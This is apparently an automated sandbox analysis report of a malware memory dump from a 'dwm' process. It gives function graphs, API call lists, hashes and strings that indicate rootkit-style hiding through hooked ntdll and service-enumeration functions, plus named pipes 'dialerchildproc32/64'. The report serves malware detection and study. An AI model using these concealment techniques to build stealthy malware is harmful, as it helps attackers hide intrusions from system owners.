                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F41754
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F4176F
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F4178F
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F417AA
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F417CA
                                                                      • Sleep.KERNEL32 ref: 00000283E0F41AD7
                                                                      • SleepEx.KERNELBASE ref: 00000283E0F41ADD
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F417E5
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F41805
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F41820
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F41840
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F4185B
                                                                        • Part of subcall function 00000283E0F41628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F4187B
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F41896
                                                                        • Part of subcall function 00000283E0F41628: RegCloseKey.ADVAPI32 ref: 00000283E0F418A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 5f1fe751c3c7d6914186e55048bddc494c29ddcbe7712ac7e3c90fed6815364c
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: CA31BB7921AA4541FB50DB26EA693A923A5FF84FD0F08D5319E0987695EF34CA738310

                                                                      Non-executed Functions

                                                                      Function 00000283E0F42B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 561 283e0f42b2c-283e0f42ba5 call 283e0f62ce0 564 283e0f42ee0-283e0f42f03 561->564 565 283e0f42bab-283e0f42bb1 561->565 565->564 566 283e0f42bb7-283e0f42bba 565->566 566->564 567 283e0f42bc0-283e0f42bc3 566->567 567->564 568 283e0f42bc9-283e0f42bd9 GetModuleHandleA 567->568 569 283e0f42bdb-283e0f42beb GetProcAddress 568->569 570 283e0f42bed 568->570 571 283e0f42bf0-283e0f42c0e 569->571 570->571 571->564 573 283e0f42c14-283e0f42c33 StrCmpNIW 571->573 573->564 574 283e0f42c39-283e0f42c3d 573->574 574->564 575 283e0f42c43-283e0f42c4d 574->575 575->564 576 283e0f42c53-283e0f42c5a 575->576 576->564 577 283e0f42c60-283e0f42c73 576->577 578 283e0f42c83 577->578 579 283e0f42c75-283e0f42c81 577->579 580 283e0f42c86-283e0f42c8a 578->580 579->580 581 283e0f42c9a 580->581 582 283e0f42c8c-283e0f42c98 580->582 583 283e0f42c9d-283e0f42ca7 581->583 582->583 584 283e0f42d9d-283e0f42da1 583->584 585 283e0f42cad-283e0f42cb0 583->585 586 283e0f42da7-283e0f42daa 584->586 587 283e0f42ed2-283e0f42eda 584->587 588 283e0f42cc2-283e0f42ccc 585->588 589 283e0f42cb2-283e0f42cbf call 283e0f4199c 585->589 590 283e0f42dbb-283e0f42dc5 586->590 591 283e0f42dac-283e0f42db8 call 283e0f4199c 586->591 587->564 587->577 593 283e0f42d00-283e0f42d0a 588->593 594 283e0f42cce-283e0f42cdb 588->594 589->588 599 283e0f42dc7-283e0f42dd4 590->599 600 283e0f42df5-283e0f42df8 590->600 591->590 596 283e0f42d3a-283e0f42d3d 593->596 597 283e0f42d0c-283e0f42d19 593->597 594->593 595 283e0f42cdd-283e0f42cea 594->595 604 283e0f42ced-283e0f42cf3 595->604 606 283e0f42d3f-283e0f42d49 call 283e0f41bbc 596->606 607 283e0f42d4b-283e0f42d58 lstrlenW 596->607 597->596 605 283e0f42d1b-283e0f42d28 597->605 599->600 609 283e0f42dd6-283e0f42de3 599->609 602 283e0f42dfa-283e0f42e03 call 283e0f41bbc 600->602 603 283e0f42e05-283e0f42e12 lstrlenW 600->603 602->603 628 283e0f42e4a-283e0f42e55 602->628 613 283e0f42e14-283e0f42e1e 603->613 614 283e0f42e35-283e0f42e3f call 283e0f43844 603->614 611 283e0f42cf9-283e0f42cfe 604->611 612 283e0f42d93-283e0f42d98 604->612 615 283e0f42d2b-283e0f42d31 605->615 606->607 606->612 617 283e0f42d5a-283e0f42d64 607->617 618 283e0f42d7b-283e0f42d8d call 283e0f43844 607->618 619 283e0f42de6-283e0f42dec 609->619 611->593 611->604 622 283e0f42e42-283e0f42e44 612->622 613->614 623 283e0f42e20-283e0f42e33 call 283e0f4152c 613->623 614->622 615->612 624 283e0f42d33-283e0f42d38 615->624 617->618 627 283e0f42d66-283e0f42d79 call 283e0f4152c 617->627 618->612 618->622 619->628 629 283e0f42dee-283e0f42df3 619->629 622->587 622->628 623->614 623->628 624->596 624->615 627->612 627->618 633 283e0f42e57-283e0f42e5b 628->633 634 283e0f42ecc-283e0f42ed0 628->634 629->600 629->619 638 283e0f42e63-283e0f42e7d call 283e0f485c0 633->638 639 283e0f42e5d-283e0f42e61 633->639 634->587 641 283e0f42e80-283e0f42e83 638->641 639->638 639->641 643 283e0f42e85-283e0f42ea3 call 283e0f485c0 641->643 644 283e0f42ea6-283e0f42ea9 641->644 643->644 644->634 646 283e0f42eab-283e0f42ec9 call 283e0f485c0 644->646 646->634
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: ebde10bc148da114d0e47b14f842ab83ffc7a893d7e46ad2df1e8aab44caf887
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 34B1A33A216A5182EBA4CF25D46876D73A5FF64F94F849036EE0953B94DF34CEA2C340
                                                                      Function 00000283E0F47D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: ce3dc0326ecd335a8d5013b0e8f71581567297813b3872f98fb1a08bb360b8ed
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: 38315E76606B8089EB60DF60E8943ED7360FB84B44F448039DE4D57B94EF38CA59C710
                                                                      Function 00000283E0F4D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: 3c1ca2c093e900777f04ca1bc539dd5001c44a41ac4037ad274e2e37fb5abaa3
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: FB31953A215F8086EB60CF65E8543AE73A0FB89B54F504135EE9D43B54DF38C666CB00
                                                                      Function 00000283E0F412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 2463c5b797d9bad466ecff0b9e84e309fb5b51cb3cd0fe10b501e93e457313a4
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: 5E51823A205B8586EB50CF62E45836A77A1FB89FC9F048134DE5907B68DF3CC666C700
                                                                      Function 00000283E0F41D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 497f9c739d475508feb68bcd3940ab8c19b0141bc7e9a6dd3358886a668f08c2
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 3731947C20794AA0EA54EBA5E8796D83321BF54F54FC1D1339C4A025629F38876FC390
                                                                      Function 00000283E0F16910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 407 283e0f16910-283e0f16916 408 283e0f16918-283e0f1691b 407->408 409 283e0f16951-283e0f1695b 407->409 411 283e0f16945-283e0f16984 call 283e0f16fc0 408->411 412 283e0f1691d-283e0f16920 408->412 410 283e0f16a78-283e0f16a8d 409->410 416 283e0f16a9c-283e0f16ab6 call 283e0f16e54 410->416 417 283e0f16a8f 410->417 427 283e0f1698a-283e0f1699f call 283e0f16e54 411->427 428 283e0f16a52 411->428 414 283e0f16938 __scrt_dllmain_crt_thread_attach 412->414 415 283e0f16922-283e0f16925 412->415 423 283e0f1693d-283e0f16944 414->423 419 283e0f16927-283e0f16930 415->419 420 283e0f16931-283e0f16936 call 283e0f16f04 415->420 430 283e0f16ab8-283e0f16aed call 283e0f16f7c call 283e0f16e1c call 283e0f17318 call 283e0f17130 call 283e0f17154 call 283e0f16fac 416->430 431 283e0f16aef-283e0f16b20 call 283e0f17190 416->431 421 283e0f16a91-283e0f16a9b 417->421 420->423 440 283e0f169a5-283e0f169b6 call 283e0f16ec4 427->440 441 283e0f16a6a-283e0f16a77 call 283e0f17190 427->441 433 283e0f16a54-283e0f16a69 428->433 430->421 442 283e0f16b22-283e0f16b28 431->442 443 283e0f16b31-283e0f16b37 431->443 460 283e0f169b8-283e0f169dc call 283e0f172dc call 283e0f16e0c call 283e0f16e38 call 283e0f1ac0c 440->460 461 283e0f16a07-283e0f16a11 call 283e0f17130 440->461 441->410 442->443 444 283e0f16b2a-283e0f16b2c 442->444 445 283e0f16b39-283e0f16b43 443->445 446 283e0f16b7e-283e0f16b94 call 283e0f1268c 443->446 450 283e0f16c1f-283e0f16c2c 444->450 451 283e0f16b45-283e0f16b4d 445->451 452 283e0f16b4f-283e0f16b5d call 283e0f25780 445->452 468 283e0f16b96-283e0f16b98 446->468 469 283e0f16bcc-283e0f16bce 446->469 457 283e0f16b63-283e0f16b78 call 283e0f16910 451->457 452->457 472 283e0f16c15-283e0f16c1d 452->472 457->446 457->472 460->461 510 283e0f169de-283e0f169e5 __scrt_dllmain_after_initialize_c 460->510 461->428 481 283e0f16a13-283e0f16a1f call 283e0f17180 461->481 468->469 477 283e0f16b9a-283e0f16bbc call 283e0f1268c call 283e0f16a78 468->477 470 283e0f16bd5-283e0f16bea call 283e0f16910 469->470 471 283e0f16bd0-283e0f16bd3 469->471 470->472 491 283e0f16bec-283e0f16bf6 470->491 471->470 471->472 472->450 477->469 502 283e0f16bbe-283e0f16bc6 call 283e0f25780 477->502 499 283e0f16a45-283e0f16a50 481->499 500 283e0f16a21-283e0f16a2b call 283e0f17098 481->500 496 283e0f16bf8-283e0f16bff 491->496 497 283e0f16c01-283e0f16c11 call 283e0f25780 491->497 496->472 497->472 499->433 500->499 509 283e0f16a2d-283e0f16a3b 500->509 502->469 509->499 510->461 511 283e0f169e7-283e0f16a04 call 283e0f1abc8 510->511 511->461
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 9685692a26b48a1aa77a0e3d75b42b625413801992bd919d6816240a4d00a3ef
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 0381BA2D70324286FA50EB66D47939922A0BF85F80F58C135AE4987797EF38CB778700
                                                                      Function 00000283E0F4CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 514 283e0f4ce28-283e0f4ce4a GetLastError 515 283e0f4ce69-283e0f4ce74 FlsSetValue 514->515 516 283e0f4ce4c-283e0f4ce57 FlsGetValue 514->516 519 283e0f4ce76-283e0f4ce79 515->519 520 283e0f4ce7b-283e0f4ce80 515->520 517 283e0f4ce59-283e0f4ce61 516->517 518 283e0f4ce63 516->518 521 283e0f4ced5-283e0f4cee0 SetLastError 517->521 518->515 519->521 522 283e0f4ce85 call 283e0f4d6cc 520->522 523 283e0f4cef5-283e0f4cf0b call 283e0f4c748 521->523 524 283e0f4cee2-283e0f4cef4 521->524 525 283e0f4ce8a-283e0f4ce96 522->525 537 283e0f4cf28-283e0f4cf33 FlsSetValue 523->537 538 283e0f4cf0d-283e0f4cf18 FlsGetValue 523->538 527 283e0f4cea8-283e0f4ceb2 FlsSetValue 525->527 528 283e0f4ce98-283e0f4ce9f FlsSetValue 525->528 529 283e0f4ceb4-283e0f4cec4 FlsSetValue 527->529 530 283e0f4cec6-283e0f4ced0 call 283e0f4cb94 call 283e0f4d744 527->530 532 283e0f4cea1-283e0f4cea6 call 283e0f4d744 528->532 529->532 530->521 532->519 543 283e0f4cf98-283e0f4cf9f call 283e0f4c748 537->543 544 283e0f4cf35-283e0f4cf3a 537->544 541 283e0f4cf1a-283e0f4cf1e 538->541 542 283e0f4cf22 538->542 541->543 546 283e0f4cf20 541->546 542->537 547 283e0f4cf3f call 283e0f4d6cc 544->547 549 283e0f4cf8f-283e0f4cf97 546->549 550 283e0f4cf44-283e0f4cf50 547->550 551 283e0f4cf62-283e0f4cf6c FlsSetValue 550->551 552 283e0f4cf52-283e0f4cf59 FlsSetValue 550->552 554 283e0f4cf80-283e0f4cf88 call 283e0f4cb94 551->554 555 283e0f4cf6e-283e0f4cf7e FlsSetValue 551->555 553 283e0f4cf5b-283e0f4cf60 call 283e0f4d744 552->553 553->543 554->549 560 283e0f4cf8a call 283e0f4d744 554->560 555->553 560->549
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 00000283E0F4CE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CEBC
                                                                      • SetLastError.KERNEL32 ref: 00000283E0F4CED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,00000283E0F4ECCC,?,?,?,?,00000283E0F4BF9F,?,?,?,?,?,00000283E0F47AB0), ref: 00000283E0F4CF2C
                                                                        • Part of subcall function 00000283E0F4D6CC: HeapAlloc.KERNEL32 ref: 00000283E0F4D721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CF54
                                                                        • Part of subcall function 00000283E0F4D744: HeapFree.KERNEL32 ref: 00000283E0F4D75A
                                                                        • Part of subcall function 00000283E0F4D744: GetLastError.KERNEL32 ref: 00000283E0F4D764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F50A6B,?,?,?,00000283E0F5045C,?,?,?,00000283E0F4C84F), ref: 00000283E0F4CF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: ef784ade3f8912ad7efddf794c5527fc649885eaec427ab5f0f5f1cdb9168253
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: 78417D3C20B24446FEA8E731557D36922427F84FB0F18D734AC3A476E6DE3886679790
                                                                      Function 00000283E0F42244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: 385a2d083aaaa3e47a41796f20ea1cd22f5d4458295a7513b2f927fc2d45fa1d
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: B3215639615B4183FB50CB65F45836977A0FB85FA5F508225DE5903BA4CF3CC656CB00
                                                                      Function 00000283E0F4A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: 0ffee878b9830413a7d1f8b93794f1e626b482ba37576317c3903531effad528
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: CCE1D67A60A75086FB60DF65D49839D77A0FF45F98F108125EE8957B96CF34C2A2C700
                                                                      Function 00000283E0F19944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: f0cd5769dceb19c785dc1d00fce1bd0c39f862e54687e6d70acd25c18d55f153
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: 23E1E63A60A74086EB60DF65D4A839D77A0FF45F98F108125EE8957B57CF38C2A2C780
                                                                      Function 00000283E0F4F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: d6ad517a6998f1ef320dbc28867cd6c900c56690440f0ae9fd2c754d03fef244
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 2941D43A31BA0091FE56CB66E8287562391BF49FE0F09C1359D1D97794EE3CCA6B8350
                                                                      Function 00000283E0F4104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: cbe8385f6ed91e7dc4bb302cef295047aa815b055e2c8c646a9a3d24166777e0
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: C0416D37215B84C6EB60CF61E45879A77A5F788F98F048129DF8A07B58DF38C59ACB00
                                                                      Function 00000283E0F4D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D087
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,00000283E0F4C7DE,?,?,?,?,?,?,?,?,00000283E0F4CF9D,?,?,00000001), ref: 00000283E0F4D0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: ade7066ce3a3ff758fac6fe570f80208f58c7e8a01b08e6c7ce4659e6d13c7e2
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 0D114C3870E24441FA68E725697D36A72417F84FF0F18C334ACA9476EADE38C6638340
                                                                      Function 00000283E0F47510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
